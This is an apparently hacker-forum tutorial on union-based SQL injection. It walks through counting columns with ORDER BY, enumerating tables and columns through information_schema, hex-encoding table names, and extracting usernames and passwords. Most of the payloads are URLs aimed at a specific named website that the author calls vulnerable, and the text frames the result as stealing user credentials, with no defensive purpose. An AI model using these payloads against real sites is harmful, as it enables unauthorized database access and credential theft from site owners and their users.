SQL Injection Tutorial By Ralphmigcute From hackforums.

net

SQL Injection Tutorial!

definition: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

Vulnerability
The sql injection will work only if the site is vulnerable to sql errors. ex: http://www. site.org/artist.php?id=74 = Vulnerable Why? Because if you put in the end of this link it will show up a error. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/bmocaorg/public_html/artist.php on line 12.

Check how many Columns!

NOTE U MUST USE -- or /* at the end of the order by To check how many columns in the database of http://www.bmoca.org/artist.php?id=74 You must use order by # Ex: http://www. site.org/artist.php?id=74 order by 1-- NO ERROR http://www. site.org/artist.php?id=74 order by 2-- NO ERROR http://www. site.org/artist.php?id=74 order by 3-- NO ERROR http://www. site.org/artist.php?id=74 order by 4-- NO ERROR http://www. site.org/artist.php?id=74 order by 5-- YOU GOT A ERROR It means that there is 4 columns in the database.

Union!
NOTE U MUST USE -- or /* at the end of the last number

In Order to know what is the number we will change we will do union You must put http://www. site.org/artist.php?id=put - here74 And you must use union then the number of columns http://www. site.org/artist.php?id=put - here74 union all select 1,2,3,4 -Example: 2 3 4 Then number will be in the site when the number show up Change one number to version() If the version is 5 and up. Go to the next page If the version is 4 and down skip the next page.

SQL Version 5
http://www.bmoca.org/artist.php?id=-74 union all select 1,version(),3,4-To check the tables http://www.bmoca.org/artist.php?id=-74 union all select 1,table_name,3,4 from information_schema.tables-The list of tables will be in the site If one table is shown use limit http://www.bmoca.org/artist.php?id=-74 union all select 1,table_name,3,4 from information_schema.tables limit 1,1-Continue increment until you find the one u are looking for. Then if you get the table you want you will need to check for the columns Change table_name to column_name Change information_schema.tables to information_schema.columns Then remove limit 1,1-Then add where table_name= Put the table name that you got in the table list but u must hex it

http://home2.paulschou.net/tools/xlate/ This tool is to convert string to hex If you choose users then the hex is 7573657273 Before you input the hex u must put 0x in the start so 0x7573657273
http://www.bmoca.org/artist.php?id=-74 union all select 1,column_name,3,4 from information_schema.columns where table_name=0x7573657273--

Then if you choose the column you want just do this to get the information: http://www.bmoca.org/artist.php?id=-74 union all select 1,concat_ws(0x3a,username,password),3,4 from users Change username , password to the column that you want then change users to the table you want. There you go. You got the user username and password

Credits to ralphmigcute